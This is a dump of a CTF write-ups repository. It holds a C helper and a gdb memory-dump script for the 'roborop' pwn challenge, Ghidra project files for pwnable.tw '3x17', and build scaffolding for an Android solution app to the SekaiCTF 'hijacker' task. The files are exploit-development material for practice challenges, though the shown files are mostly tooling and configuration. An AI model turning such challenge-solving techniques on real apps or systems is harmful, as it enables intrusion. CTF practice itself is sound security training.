| } 27 | srand_t srand_func = dlsym(libc_handle, "srand"); 28 | if(!srand_func) 29 | printf("dlsym srand: %s\n", dlerror()); 30 | rand_t rand_func = dlsym(libc_handle, "rand"); 31 | if(!rand_func) 32 | printf("dlsym srand: %s\n", dlerror()); 33 | 34 | srand_func(seed); 35 | for(int i=0; i<0x4000000; i++) { 36 | int r = rand_func(); 37 | addr[i] = r; 38 | } 39 | if(dlclose(libc_handle) != 0) 40 | printf("dlclose: %s\n", dlerror()); 41 | return 0; 42 | } 43 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/dummy.gdbscript: -------------------------------------------------------------------------------- 1 | 2 | # gdb -x dummy.gdbscript --nh --args ./dummy 1234 3 | 4 | set confirm off 5 | set pagination off 6 | set disassembly-flavor intel 7 | 8 | b *main 9 | command 10 | silent 11 | 12 | # Break when mmap returns. 13 | # To achieve that, we tbreak at mmap entry and then insert a breakpoint 14 | # at the return address. 15 | tbreak *mmap 16 | command 17 | silent 18 | tbreak *(*(char**)($rsp)) 19 | command 20 | silent 21 | set $addr=$rax 22 | continue 23 | end 24 | continue 25 | end 26 | continue 27 | end 28 | 29 | b *dlclose 30 | command 31 | silent 32 | x/10bx $addr 33 | dump memory code $addr $addr+0x10000000 34 | continue 35 | end 36 | 37 | set $_exitcode = -999 38 | define hook-stop 39 | if $_exitcode != -999 40 | printf "exit code: %d\n", $_exitcode 41 | quit 42 | end 43 | end 44 | 45 | run 46 | 47 | -------------------------------------------------------------------------------- /midnight-quals-24/pwn/roborop/resources/roborop.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/midnight-quals-24/pwn/roborop/resources/roborop.tar.gz -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17 -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.gpr: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17-ghidra.gpr -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/00/00000000.prp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/00/~00000000.db/db.13.gbf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/pwnable.tw/3x17/3x17-ghidra.rep/idata/00/~00000000.db/db.13.gbf -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/~index.bak: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | 00000000:3x17:7f0119dfd1381071386625 4 | NEXT-ID:1 5 | MD5:d41d8cd98f00b204e9800998ecf8427e 6 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/idata/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | 00000000:3x17:7f0119dfd1381071386625 4 | NEXT-ID:1 5 | MD5:d41d8cd98f00b204e9800998ecf8427e 6 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/project.prp: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/projectState: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/user/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/versioned/~index.bak: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | -------------------------------------------------------------------------------- /pwnable.tw/3x17/3x17-ghidra.rep/versioned/~index.dat: -------------------------------------------------------------------------------- 1 | VERSION=1 2 | / 3 | NEXT-ID:0 4 | MD5:d41d8cd98f00b204e9800998ecf8427e 5 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/resources/secure_app.apk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/resources/secure_app.apk -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/.gitignore: -------------------------------------------------------------------------------- 1 | *.iml 2 | .gradle 3 | /local.properties 4 | /.idea/caches 5 | /.idea/libraries 6 | /.idea/modules.xml 7 | /.idea/workspace.xml 8 | /.idea/navEditor.xml 9 | /.idea/assetWizardSettings.xml 10 | .DS_Store 11 | /build 12 | /captures 13 | .externalNativeBuild 14 | .cxx 15 | local.properties 16 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/.gitignore: -------------------------------------------------------------------------------- 1 | /build -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/build.gradle.kts: -------------------------------------------------------------------------------- 1 | plugins { 2 | alias(libs.plugins.android.application) 3 | alias(libs.plugins.jetbrains.kotlin.android) 4 | } 5 | 6 | android { 7 | namespace = "zero.tolerance.sekaidemo" 8 | compileSdk = 34 9 | 10 | defaultConfig { 11 | applicationId = "zero.tolerance.sekaidemo" 12 | minSdk = 28 13 | targetSdk = 34 14 | versionCode = 1 15 | versionName = "1.0" 16 | 17 | testInstrumentationRunner = "androidx.test.runner.AndroidJUnitRunner" 18 | } 19 | 20 | buildTypes { 21 | release { 22 | isMinifyEnabled = false 23 | proguardFiles( 24 | getDefaultProguardFile("proguard-android-optimize.txt"), 25 | "proguard-rules.pro" 26 | ) 27 | } 28 | } 29 | compileOptions { 30 | sourceCompatibility = JavaVersion.VERSION_1_8 31 | targetCompatibility = JavaVersion.VERSION_1_8 32 | } 33 | kotlinOptions { 34 | jvmTarget = "1.8" 35 | } 36 | } 37 | 38 | dependencies { 39 | 40 | implementation(libs.androidx.core.ktx) 41 | implementation(libs.androidx.appcompat) 42 | implementation(libs.material) 43 | implementation(libs.androidx.activity) 44 | implementation(libs.androidx.constraintlayout) 45 | testImplementation(libs.junit) 46 | androidTestImplementation(libs.androidx.junit) 47 | androidTestImplementation(libs.androidx.espresso.core) 48 | } -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/proguard-rules.pro: -------------------------------------------------------------------------------- 1 | # Add project specific ProGuard rules here. 2 | # You can control the set of applied configuration files using the 3 | # proguardFiles setting in build.gradle. 4 | # 5 | # For more details, see 6 | # http://developer.android.com/guide/developing/tools/proguard.html 7 | 8 | # If your project uses WebView with JS, uncomment the following 9 | # and specify the fully qualified class name to the JavaScript interface 10 | # class: 11 | #-keepclassmembers class fqcn.of.javascript.interface.for.webview { 12 | # public *; 13 | #} 14 | 15 | # Uncomment this to preserve the line number information for 16 | # debugging stack traces. 17 | #-keepattributes SourceFile,LineNumberTable 18 | 19 | # If you keep the line number information, uncomment this to 20 | # hide the original source file name. 21 | #-renamesourcefileattribute SourceFile -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/AndroidManifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 4 | 5 | 6 | 7 | 8 | 9 | 19 | 22 | 23 | 24 | 25 | 26 | 27 | 30 | 31 | 32 | 33 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/drawable/ic_launcher_foreground.xml: -------------------------------------------------------------------------------- 1 | 7 | 8 | 9 | 15 | 18 | 21 | 22 | 23 | 24 | 30 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/layout/activity_main.xml: -------------------------------------------------------------------------------- 1 | 2 | 9 | 10 | 18 | 19 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/layout/overlay_view.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 12 | 13 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-anydpi/ic_launcher.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-anydpi/ic_launcher_round.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-hdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-mdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nikosChalk/ctf-writeups/c57a6c1f2514fd941d2ef8f811aaacd75716c462/sekaictf24/hijacker/solution/app/src/main/res/mipmap-xxxhdpi/ic_launcher_round.webp -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values-night/themes.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/colors.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | #FF000000 4 | #FFFFFFFF 5 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/strings.xml: -------------------------------------------------------------------------------- 1 | 2 | SekaiDemo 3 | -------------------------------------------------------------------------------- /sekaictf24/hijacker/solution/app/src/main/res/values/themes.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 |